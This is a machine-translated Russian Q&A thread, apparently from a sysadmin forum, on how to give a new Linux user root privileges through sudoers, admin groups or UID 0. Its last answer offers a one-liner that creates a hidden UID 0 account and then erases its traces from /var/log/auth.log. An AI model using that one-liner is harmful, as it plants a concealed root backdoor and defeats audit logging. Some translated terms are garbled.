Я хочу добавить нового пользователя и предоставить / предоставить этому новому пользователю все права root, как я могу это сделать?
Я сделал, sudo adduser --system testuser
но это не работает, как я ожидал.
Спасибо за помощь.
Я хочу добавить нового пользователя и предоставить / предоставить этому новому пользователю все права root, как я могу это сделать?
Я сделал, sudo adduser --system testuser
но это не работает, как я ожидал.
Спасибо за помощь.
Ответы:
На самом деле есть три способа сделать это: правильный путь, неправильный путь и ужасный путь.
Сначала создайте учетную запись обычного пользователя.
adduser username
Затем выберите один из следующих вариантов:
Создайте sudo
запись для wheel
группы /etc/sudoers
следующим образом:
## Allows people in group wheel to run all commands
%wheel ALL=(ALL) ALL
Или для «современных» версий:
## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL) ALL
Затем добавьте пользователя в wheel
группу. Добавление и удаление пользователей с административными привилегиями теперь становится функцией запоминания добавления их в wheel вместо создания записи в sudo. Преимущество использования wheel заключается в том, что вы можете расширить этот механизм в другие схемы аутентификации, которые поддерживают группы, например winbind / Active Directory, и воспользоваться преимуществами этого процесса. Это можно сделать, сопоставив колесо с группой в вашей схеме аутентификации, имеющей права администратора.
Обратите внимание, что в некоторых дистрибутивах используются разные административные учетные записи. Колесо является «традиционным» подход к этому, но вы можете столкнуться admin
, adm
и другие учетные записи групп , которые служат той же цели.
Последующее редактирование:
Я должен дать точку зрения Барту Сильверстриму за то, что он указал, что Ubuntu использует admin
в качестве группы для этой цели. Сначала он добрался до этого, хотя в то время я не заметил тега Ubuntu. Опять же, все зависит от того, какой дистрибутив вы используете.
Создайте запись sudo для рассматриваемой учетной записи пользователя и затем предоставьте полный доступ. Опять же, вы создаете запись /etc/sudoers
следующим образом:
## Allows just user "username" to run all commands as root
username ALL=(ALL) ALL
ДОБАВЛЕНО: ## Для версии Ubuntu: имя пользователя ВСЕ = (ВСЕ: ВСЕ)
Это замечательно, если у вас есть только одна (или две) нормальные учетные записи. Это ужасно, если у вас есть сотни учетных записей на нескольких (геофизических) сайтах, и вам нужно постоянно поддерживать файл sudo.
Вы можете отредактировать /etc/passwd
файл и изменить идентификатор учетной записи пользователя с любого номера на 0
. Это верно, ноль .
username:x:0:502::/home/username:/bin/bash
Видите эту третью запись как ноль? Когда вы входите в эту учетную запись, вы, для всех эффективных целей root
. Я не рекомендую это. Если вы не помните, «кто вы», вы можете создать все виды хаоса, когда начинаете создавать и трогать файлы как root
. Вы также можете добавить свое имя пользователя в root
группу. Это имеет тот же эффект для доступа к файлам, но создает другие проблемы; программы заметят, что вы не являетесь пользователем, root
и откажутся запускаться, но вы получите доступ к файлам, принадлежащим группе root
.
Если вы сделали это, вы использовали vipw
вместо того, чтобы просто редактировать vi
, верно? (или каков ваш любимый текстовый редактор). В конце концов, одна опечатка в этом файле может заблокировать вас из вашей системы - и это означает физический визит к рассматриваемому компьютеру с ремонтным диском ...
Я использовал это в течение многих лет, и это рекомендуемый способ # 1 добавить sudoer в AskUbuntu :
adduser existinguser sudo
Гораздо проще, чем редактирование файлов, и легко добавить сценарий оболочки для автоматической установки.
Если вы хотите создать пользователя и предоставить права sudo, вы можете сделать это в одной строке, например:
useradd newuser -m -G sudo
passwd newuser
-m
создал домашний каталог и -G
указывает дополнительную группу.
Ну, вы можете создать пользователя с Adduser, смотрите Man Adduser.
После вы можете добавить его в привилегированную группу, например, root или wheel. Но я думаю, что наиболее рекомендуемый способ получить разрешение - использовать sudo.
"Гадкий и грязный" способ - отредактировать / etc / passwd так, чтобы UID = 0 И GID = 0 для нового пользователя. Но это создает много угроз безопасности . Вы знаете, что если он также является пользователем root, он может отключить ваш аккаунт, изменить свой пароль, сделать вас "обычным пользователем" ... верно? так почему бы просто не дать ему свой аккаунт?
Вы можете изучить, как работает suid ( http://en.wikipedia.org/wiki/Setuid ), если вы хотите предоставить ему root-доступ только для нескольких команд.
Вот один вкладыш:
USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;'
/var/log/auth.log
Лучший,